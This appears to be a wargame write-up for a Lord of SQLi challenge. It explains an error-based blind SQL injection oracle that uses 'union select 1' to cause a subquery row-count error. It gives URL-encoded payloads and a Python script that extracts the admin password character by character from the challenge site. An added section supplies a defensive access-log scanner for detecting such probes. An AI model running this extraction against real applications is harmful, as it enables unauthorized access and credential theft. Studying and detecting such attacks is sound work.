Source code analysis
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/col|if|case|when|sleep|benchmark/i', $_GET[pw])) exit("HeHe");
This is very similar to the problem solved earlier; filtering for col, if, case and when has been added.
if(mysql_error()) exit();
echo "<hr>query : <strong>{$query}</strong><hr><br>";
Also, when a mysql error occurs, the error message is not shown.
?pw=%27%20or%20(id=%27admin%27%20and(select%20length(pw)=8%20union%20select%201))%23
- When length(pw) is true -
(Because union does the same work as union distinct, the duplicate value is removed, so the subquery returns a single row and no error occurs.)
- When length(pw) is false -
When it is false, an error occurs and the page comes back empty.
ERROR 1242 (21000): Subquery returns more than 1 row
?pw=%27%20or%20(id=%27admin%27%20and(select%20length(mid(pw,1,1))=1%20union%20select%201))%23
import http.client
from urllib.parse import quote

result = ''
leng = 0
# Session cookie for the challenge site goes here (left blank in the original).
header = {'Cookie': ' '}
string = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_-=+"

# Step 1: find the password length. A true comparison makes the subquery return
# one row (union drops the duplicate) and the page prints the query text; a false
# one returns two rows, raises "Subquery returns more than 1 row" and the page
# comes back empty.
for i in range(1, 100):
    length = '/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php?pw=%27%20or%20(id=%27admin%27%20and(select%20length(pw)=' + str(i) + '%20union%20select%201))%23'
    conn = http.client.HTTPConnection('los.eagle-jump.org')
    conn.request('GET', length, '', header)
    data = conn.getresponse().read()
    if "query" in data.decode():
        leng = i
        print("pw length: " + str(i))
        break

# Step 2: recover the password one character at a time with the same oracle.
for i in range(1, leng + 1):
    for j in range(0, len(string)):
        # Percent-encode the guessed character so '#', '%' and '&' survive in the URL.
        substr = '/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php?pw=%27%20or%20(id=%27admin%27%20and(select%20substr(pw,' + str(i) + ',1)=%27' + quote(string[j], safe='') + '%27%20union%20select%201))%23'
        conn = http.client.HTTPConnection('los.eagle-jump.org')
        conn.request('GET', substr, '', header)
        data = conn.getresponse().read()
        if "query" in data.decode():
            result = result + string[j]
            print('substr(pw,' + str(i) + ',1)= ' + string[j])
            break

print('Password is ' + result)
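From the defender's side, the oracle described above leaves a very regular trace in the web server access log: a subquery comparison UNIONed with a constant, repeated with only the compared literal changing. The following added example (not part of the original post) scans constructed access-log lines shaped like the requests above and groups each client's probes by template; the log lines, client addresses and thresholds are assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not taken from the original post), shaped like
# the requests the script above sends: two length() probes and two substr() probes
# from one client, and one ordinary login attempt from another.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jun/2017:12:00:01 +0900] "GET /dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php?pw=%27%20or%20(id=%27admin%27%20and(select%20length(pw)=7%20union%20select%201))%23 HTTP/1.1" 200 312
10.0.0.5 - - [01/Jun/2017:12:00:02 +0900] "GET /dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php?pw=%27%20or%20(id=%27admin%27%20and(select%20length(pw)=8%20union%20select%201))%23 HTTP/1.1" 200 640
10.0.0.5 - - [01/Jun/2017:12:00:03 +0900] "GET /dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php?pw=%27%20or%20(id=%27admin%27%20and(select%20substr(pw,1,1)=%270%27%20union%20select%201))%23 HTTP/1.1" 200 312
10.0.0.5 - - [01/Jun/2017:12:00:04 +0900] "GET /dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php?pw=%27%20or%20(id=%27admin%27%20and(select%20substr(pw,1,1)=%271%27%20union%20select%201))%23 HTTP/1.1" 200 312
10.0.0.9 - - [01/Jun/2017:12:00:05 +0900] "GET /dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php?pw=hello HTTP/1.1" 200 640
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"GET (\S+) HTTP/')
# Shape of the oracle used in this challenge: a comparison inside a subquery that is
# UNIONed with a constant, so the subquery's row count (1 or 2) leaks one boolean.
PROBE_RE = re.compile(r'\(\s*select\b.*?(=|<|>|\blike\b).*?\bunion\s+(all\s+)?select\b',
                      re.IGNORECASE | re.DOTALL)

def template(value):
    """Replace every compared literal with '?' so probes that differ only in the
    guessed value (length, character) collapse onto the same template."""
    return re.sub(r"=\s*('[^']*'|\d+)", "=?", value)

def probes(log_text):
    """Yield (client, template) for each decoded query-string value matching PROBE_RE."""
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        for values in parse_qs(urlsplit(target).query, keep_blank_values=True).values():
            for v in values:          # parse_qs already percent-decodes the value
                if PROBE_RE.search(v):
                    yield client, template(v)

def scan(log_text, min_probes=2):
    """Return {client: {template: count}} for clients whose probe total reaches
    min_probes; many hits on one template is the enumeration loop in progress."""
    by_client = defaultdict(Counter)
    for client, tmpl in probes(log_text):
        by_client[client][tmpl] += 1
    return {c: dict(t) for c, t in by_client.items() if sum(t.values()) >= min_probes}

if __name__ == "__main__":
    for client, templates in scan(SAMPLE_LOG).items():
        print(client, templates)
```

Because the application hides the MySQL error, the response status alone looks normal (200 in both cases); the per-template repetition from one client is the signal to alert on.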